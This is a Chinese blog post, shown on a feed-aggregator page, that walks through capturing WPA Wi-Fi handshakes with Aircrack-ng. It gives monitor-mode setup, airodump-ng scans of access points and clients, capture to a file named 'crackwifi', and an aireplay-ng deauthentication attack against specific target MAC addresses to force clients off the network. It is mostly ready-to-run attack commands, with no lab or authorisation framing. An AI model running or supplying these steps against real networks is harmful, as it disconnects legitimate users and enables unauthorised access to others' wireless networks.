惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

爱范儿
爱范儿
WordPress大学
WordPress大学
博客园 - 【当耐特】
The Cloudflare Blog
B
Blog
Last Week in AI
Last Week in AI
小众软件
小众软件
量子位
S
SegmentFault 最新的问题
V
Visual Studio Blog
博客园 - 叶小钗
美团技术团队
阮一峰的网络日志
阮一峰的网络日志
Hugging Face - Blog
Hugging Face - Blog
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
宝玉的分享
宝玉的分享
A
About on SuperTechFans
雷峰网
雷峰网
J
Java Code Geeks
Microsoft Azure Blog
Microsoft Azure Blog
腾讯CDC
MongoDB | Blog
MongoDB | Blog
酷 壳 – CoolShell
酷 壳 – CoolShell
Martin Fowler
Martin Fowler

博客园 - airoot

用得顺手的软件记录 关闭win11开始菜单中的“全部” Chrome浏览器升级到138后不支持MV2插件 BGP 在线工具全景:从路由监控到策略验证 Chrome历史版本下载 Hyper Server 2019安装I226-V网卡驱动 FortiGate连接中国联通SDWAN Pve安装Win10 解决zabbix7.0图形中文乱码 openwrt squashfs镜像扩容 Redmi AX3000免拆开启SSH刷入OpenWrt vRealize Operations Manager 报告和大屏配置 使用 Cloudflare Tunnel 作为反向代理访问内网服务 PVE8.3.1创建LXC部署Docker PVE的local和local-lvm PVE8.3.1安装注意事项 Openwrt作为旁路由的必要设置 PVE8.3.1 直通硬盘 PVE8.3.1开启核显虚拟化SR-IOV PVE8.3.1 LXC下安装 OpenWRT 记录 PVE 8.3.1安装后的优化 ESXi 直通 7840HS 核显 Esxi intel iGPU SR-IOV
Aircrack-ng抓握手包
airoot · 2026-07-11 · via 博客园 - airoot

执行命令前最好用sudo -i 切换到root权限

#1,最好使用外置无线网卡,如果使用虚拟机的,把无线网卡直通到虚拟机

#2,查看网卡是否识别,通常第一块无线网卡名称为:wlan0,以下操作以wlan0举例

#3,执行扫描前清除一次进程

#4,开启网卡监听,通常情况下,成功开启监听后"ifconfig"命令可以查看到"wlan0"会变成"wlan0mon"

#5,开始扫描WIFI

该命令默认扫描的是2.4G频段,如果需要扫描全部频段,可以使用以下命令

airodump-ng wlan0mon -b abg

如果只需要扫描5G频段,可以使用以下命令

airodump-ng wlan0mon -b a

另外,也可以使用以下命令查看无线网卡是否支持5G

图片

这里分上下两部分内容,第一部分是扫描到的SSID(AP)列表,在ESSID列可以看到Wifi名称

第二部分是WIFI下面连接的客户端,也就是STATION,所以最佳的条件是你的目标AP下已经有已连接的客户端,便于后面抓握手包。

满足以上条件后,可以按Ctrl+C终止了,并记录以下数据:
• 目标 BSSID(AP的物理MAC)
• CH(信道)

#6,抓包

命令格式

airodump-ng --bssid <目标BSSID> -c <信道> -w <文件保存路径> <无线网卡名称>

 本案例为

airodump-ng --bssid E6:B4:2F:4E:09:82 -c 6 -w /home/kali/Desktop/crackwifi wlan0mon

 执行这个命令后,保持终端窗口不要关闭,当用户掉线以后再次连接,就会抓到握手包。出现下图Handshake即可按Ctrl+C停止。

图片

抓到的握手包的路径是刚才定义的 /home/kali/Desktop 目录下的 .cap 文件

#7 补充

通常情况下需要等到对方客户端重连才能获取握手包,我们不可能一直等着,所以可以采取主动Attack强制客户端下线诱发重连,这里注意需要另开一个终端执行命令,命令格式为

aireplay-ng -0 <Attack次数> -a <目标BSSID> -c <已连接的客户端MAC地址> <网卡名称>

本案例为

aireplay-ng -0 10 -a A4:1A:3A:05:AB:C3 -c 7E:82:9E:BE:09:A5 wlan0mon

 通常情况下,执行完这个命令后,就能有效帮助步骤6抓到握手包。